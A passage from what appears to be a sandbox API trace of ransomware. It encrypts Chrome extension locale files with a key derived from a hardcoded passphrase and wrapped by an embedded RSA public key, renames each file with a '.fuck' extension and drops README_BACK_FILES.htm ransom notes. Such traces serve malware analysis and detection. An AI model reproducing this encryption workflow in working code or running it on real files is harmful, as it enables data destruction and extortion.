data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json"), bFailIfExists=0) returned 1 [0258.120] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json", dwFileAttributes=0x0) returned 1 [0258.120] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json.gsg")) returned 1 [0258.122] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json.fuck")) returned 1 [0258.123] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0258.123] CryptDestroyKey (hKey=0x2e7fec0) returned 1 [0258.123] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0258.123] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0258.123] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0258.123] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\readme_back_files.htm")) returned 0xffffffff [0258.123] AreFileApisANSI () returned 1 [0258.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0258.124] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.124] GetFileType (hFile=0x5d50) returned 0x1 [0258.124] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0258.125] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.125] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0258.126] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.126] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.126] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0258.126] GetLastError () returned 0x0 [0258.126] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json")) returned 0x20 [0258.127] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json", dwFileAttributes=0x80) returned 1 [0258.127] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0258.128] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.128] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0258.129] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e796a8) returned 1 [0258.131] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0258.131] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.131] CryptHashData (hHash=0x2e7fdc0, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.131] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e7fdc0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ffc0) returned 1 [0258.131] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.131] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0258.131] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e7a0c0) returned 1 [0258.131] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7a0c0, dwCertEncodingType=0x1, pInfo=0x2e270b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e270e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e270e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7fec0) returned 1 [0258.131] CryptEncrypt (in: hKey=0x2e7fec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0258.131] CryptEncrypt (in: hKey=0x2e7fec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7a830*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e7a830*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0258.132] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e7a830*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e7a830*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0258.132] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xdd, lpOverlapped=0x0) returned 1 [0258.133] CryptEncrypt (in: hKey=0x2e7ffc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xdd, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0258.133] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0258.133] CloseHandle (hObject=0x5d5c) returned 1 [0258.134] CloseHandle (hObject=0x5d60) returned 1 [0258.134] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json"), bFailIfExists=0) returned 1 [0258.137] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json", dwFileAttributes=0x0) returned 1 [0258.138] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json.gsg")) returned 1 [0258.138] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\messages.json.fuck")) returned 1 [0258.139] CryptDestroyHash (hHash=0x2e7fdc0) returned 1 [0258.139] CryptDestroyKey (hKey=0x2e7ffc0) returned 1 [0258.139] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0258.140] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0258.140] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0258.140] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\readme_back_files.htm")) returned 0xffffffff [0258.140] AreFileApisANSI () returned 1 [0258.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0258.140] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.141] GetFileType (hFile=0x5d50) returned 0x1 [0258.141] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0258.141] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.142] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fdc0 [0258.142] FindNextFileA (in: hFindFile=0x2e7fdc0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.142] FindNextFileA (in: hFindFile=0x2e7fdc0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.142] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0258.142] GetLastError () returned 0x0 [0258.142] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_cn\\messages.json")) returned 0x20 [0258.142] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x80) returned 1 [0258.142] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.143] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_cn\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0258.144] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0258.144] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e796a8) returned 1 [0258.146] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0258.146] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.146] CryptHashData (hHash=0x2e7fbc0, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.146] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e7fbc0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7fc00) returned 1 [0258.146] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.146] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0258.146] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e7abe8) returned 1 [0258.147] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7abe8, dwCertEncodingType=0x1, pInfo=0x2e27180*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e271b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e271b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7fa40) returned 1 [0258.147] CryptEncrypt (in: hKey=0x2e7fa40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0258.147] CryptEncrypt (in: hKey=0x2e7fa40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7a8b8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e7a8b8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0258.147] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e7a8b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e7a8b8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0258.148] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xb0, lpOverlapped=0x0) returned 1 [0258.149] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xb0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0258.149] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0258.149] CloseHandle (hObject=0x5d60) returned 1 [0258.149] CloseHandle (hObject=0x5d5c) returned 1 [0258.149] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_cn\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_cn\\messages.json"), bFailIfExists=0) returned 1 [0258.152] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x0) returned 1 [0258.152] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_cn\\messages.json.gsg")) returned 1 [0258.154] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_cn\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_cn\\messages.json.fuck")) returned 1 [0258.156] CryptDestroyHash (hHash=0x2e7fbc0) returned 1 [0258.156] CryptDestroyKey (hKey=0x2e7fc00) returned 1 [0258.156] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0258.156] FindNextFileA (in: hFindFile=0x2e7fdc0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0258.156] FindClose (in: hFindFile=0x2e7fdc0 | out: hFindFile=0x2e7fdc0) returned 1 [0258.156] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_cn\\readme_back_files.htm")) returned 0xffffffff [0258.156] AreFileApisANSI () returned 1 [0258.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0258.156] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: 